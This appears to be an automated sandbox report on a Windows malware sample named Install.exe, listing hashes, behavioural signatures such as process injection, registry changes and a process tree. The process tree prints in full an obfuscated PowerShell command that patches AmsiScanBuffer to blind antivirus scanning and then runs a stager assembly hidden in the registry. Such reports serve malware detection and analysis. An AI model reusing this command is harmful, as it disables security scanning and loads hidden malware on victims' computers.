Analysis
-
max time kernel
77s -
max time network
7s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
20-07-2024 10:22
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win11-20240709-en
Errors
General
-
Target
Install.exe
-
Size
162KB
-
MD5
1f78e6c795dd5a5f174363bb791706a2
-
SHA1
80924b5502190d916ac762425dade5e7143d7377
-
SHA256
08c51db49a008bed57f54a6370e8df0f00994acf066647c8986232bf07b3d5ec
-
SHA512
d6b1afd0489c489aad516cc83466198521cd6e9ff670d6aa76bf274f01de6b25959d495c6286718961f78517ba6d6bcd335777ecd4e8cfe33a4f04f59ab83e87
-
SSDEEP
3072:cQps/fyjjeCg4fuJaoyXekMt/q1lau7qt5a7v+kDh4tufgLgpMj:cQps/fyjjegfuR+t1kuet5GlELgpW
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3040 created 640 3040 powershell.EXE 5 -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3040 set thread context of 1272 3040 powershell.EXE 84 -
Modifies data under HKEY_USERS 49 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3040 powershell.EXE 3040 powershell.EXE 3040 powershell.EXE 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe 1272 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 3040 powershell.EXE Token: SeDebugPrivilege 3040 powershell.EXE Token: SeDebugPrivilege 1272 dllhost.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3140 PickerHost.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3876 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3040 wrote to memory of 1272 3040 powershell.EXE 84 PID 3040 wrote to memory of 1272 3040 powershell.EXE 84 PID 3040 wrote to memory of 1272 3040 powershell.EXE 84 PID 3040 wrote to memory of 1272 3040 powershell.EXE 84 PID 3040 wrote to memory of 1272 3040 powershell.EXE 84 PID 3040 wrote to memory of 1272 3040 powershell.EXE 84 PID 3040 wrote to memory of 1272 3040 powershell.EXE 84 PID 3040 wrote to memory of 1272 3040 powershell.EXE 84 PID 1272 wrote to memory of 640 1272 dllhost.exe 5 PID 1272 wrote to memory of 700 1272 dllhost.exe 7 PID 1272 wrote to memory of 988 1272 dllhost.exe 12 PID 1272 wrote to memory of 424 1272 dllhost.exe 13 PID 1272 wrote to memory of 724 1272 dllhost.exe 14 PID 1272 wrote to memory of 396 1272 dllhost.exe 15 PID 1272 wrote to memory of 1052 1272 dllhost.exe 16 PID 1272 wrote to memory of 1176 1272 dllhost.exe 18 PID 1272 wrote to memory of 1184 1272 dllhost.exe 19 PID 1272 wrote to memory of 1240 1272 dllhost.exe 20 PID 1272 wrote to memory of 1248 1272 dllhost.exe 21 PID 1272 wrote to memory of 1328 1272 dllhost.exe 22 PID 1272 wrote to memory of 1348 1272 dllhost.exe 23 PID 1272 wrote to memory of 1404 1272 dllhost.exe 24 PID 1272 wrote to memory of 1472 1272 dllhost.exe 25 PID 1272 wrote to memory of 1560 1272 dllhost.exe 26 PID 1272 wrote to memory of 1572 1272 dllhost.exe 27 PID 1272 wrote to memory of 1712 1272 dllhost.exe 28 PID 1272 wrote to memory of 1740 1272 dllhost.exe 29 PID 1272 wrote to memory of 1792 1272 dllhost.exe 30 PID 1272 wrote to memory of 1816 1272 dllhost.exe 31 PID 1272 wrote to memory of 1824 1272 dllhost.exe 32 PID 1272 wrote to memory of 1840 1272 dllhost.exe 33 PID 1272 wrote to memory of 1852 1272 dllhost.exe 34 PID 1272 wrote to memory of 1940 1272 dllhost.exe 35 PID 1272 wrote to memory of 1960 1272 dllhost.exe 36 PID 1272 wrote to memory of 416 1272 dllhost.exe 37 PID 1272 wrote to memory of 2160 1272 dllhost.exe 39 PID 1272 wrote to memory of 2312 1272 dllhost.exe 40 PID 1272 wrote to memory of 2496 1272 dllhost.exe 41 PID 1272 wrote to memory of 2504 1272 dllhost.exe 42 PID 1272 wrote to memory of 2520 1272 dllhost.exe 43 PID 1272 wrote to memory of 2552 1272 dllhost.exe 44 PID 1272 wrote to memory of 2564 1272 dllhost.exe 45 PID 1272 wrote to memory of 2592 1272 dllhost.exe 46 PID 1272 wrote to memory of 2624 1272 dllhost.exe 47 PID 1272 wrote to memory of 2692 1272 dllhost.exe 48 PID 1272 wrote to memory of 2972 1272 dllhost.exe 49 PID 1272 wrote to memory of 3028 1272 dllhost.exe 50 PID 1272 wrote to memory of 3092 1272 dllhost.exe 51 PID 1272 wrote to memory of 3292 1272 dllhost.exe 52 PID 1272 wrote to memory of 3436 1272 dllhost.exe 53 PID 1272 wrote to memory of 3464 1272 dllhost.exe 54 PID 1272 wrote to memory of 3784 1272 dllhost.exe 57 PID 1272 wrote to memory of 3876 1272 dllhost.exe 58 PID 1272 wrote to memory of 3984 1272 dllhost.exe 59 PID 1272 wrote to memory of 4008 1272 dllhost.exe 60 PID 1272 wrote to memory of 4384 1272 dllhost.exe 61 PID 1272 wrote to memory of 4488 1272 dllhost.exe 62 PID 1272 wrote to memory of 5112 1272 dllhost.exe 65 PID 1272 wrote to memory of 940 1272 dllhost.exe 66 PID 1272 wrote to memory of 1908 1272 dllhost.exe 67 PID 1272 wrote to memory of 3932 1272 dllhost.exe 69 PID 1272 wrote to memory of 1556 1272 dllhost.exe 70 PID 1272 wrote to memory of 2720 1272 dllhost.exe 71 PID 1272 wrote to memory of 3128 1272 dllhost.exe 72 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:640
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:424
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1800318d-e794-4461-b5bb-b2a5c01bcdb8}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1272
-
-
C:\Windows\system32\wlrmdr.exe-s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 32⤵PID:1432
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:396
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1176
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GHRxbMvcTCpZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FdGRrXgaeOjLdg,[Parameter(Position=1)][Type]$MKXUzVkUcb)$xfpUuzjvNNe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+'l'+''+'e'+'c'+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+'o'+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+',P'+'u'+'b'+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+''+'a'+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'An'+'s'+''+[Char](105)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$xfpUuzjvNNe.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'pe'+'c'+''+'i'+''+'a'+''+[Char](108)+'N'+[Char](97)+''+'m'+'e'+[Char](44)+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$FdGRrXgaeOjLdg).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+'i'+'m'+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$xfpUuzjvNNe.DefineMethod('I'+[Char](110)+''+[Char](118)+'o'+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$MKXUzVkUcb,$FdGRrXgaeOjLdg).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+'im'+[Char](101)+','+[Char](77)+''+'a'+''+'n'+''+[Char](97)+'ged');Write-Output $xfpUuzjvNNe.CreateType();}$dtqcxdeUPJXeF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+'d'+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+'e'+''+'N'+''+[Char](97)+''+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+'ods');$jCmyeacjNVoftR=$dtqcxdeUPJXeF.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+''+'r'+''+[Char](111)+''+'c'+'Ad'+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fKlXpnnqpbjZAGzBvXE=GHRxbMvcTCpZ @([String])([IntPtr]);$NfAPVdzSgXdwzeVdySSjJD=GHRxbMvcTCpZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$oAcOFnNCivs=$dtqcxdeUPJXeF.GetMethod(''+'G'+'e'+'t'+'M'+'o'+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$VpetZibFeCvqXw=$jCmyeacjNVoftR.Invoke($Null,@([Object]$oAcOFnNCivs,[Object](''+[Char](76)+'oad'+'L'+''+'i'+''+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+'A'+'')));$DVTLramvSAfaUAQSl=$jCmyeacjNVoftR.Invoke($Null,@([Object]$oAcOFnNCivs,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+'o'+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$IwFQlYq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VpetZibFeCvqXw,$fKlXpnnqpbjZAGzBvXE).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i.'+[Char](100)+''+'l'+'l');$UDldUbdSIbUOsznPp=$jCmyeacjNVoftR.Invoke($Null,@([Object]$IwFQlYq,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+[Char](102)+''+[Char](101)+'r')));$sidRtilLRn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DVTLramvSAfaUAQSl,$NfAPVdzSgXdwzeVdySSjJD).Invoke($UDldUbdSIbUOsznPp,[uint32]8,4,[ref]$sidRtilLRn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UDldUbdSIbUOsznPp,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DVTLramvSAfaUAQSl,$NfAPVdzSgXdwzeVdySSjJD).Invoke($UDldUbdSIbUOsznPp,[uint32]8,0x20,[ref]$sidRtilLRn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+'s'+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3040
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1248
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1404
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2972
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1560
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1940
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1960
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:416
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2160
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Modifies data under HKEY_USERS
PID:2520
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2552
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3028
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3092
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3292 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵PID:2392
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3464
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3784
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3876
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4008
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:940
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:3932
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:1556
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3728
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2844
-
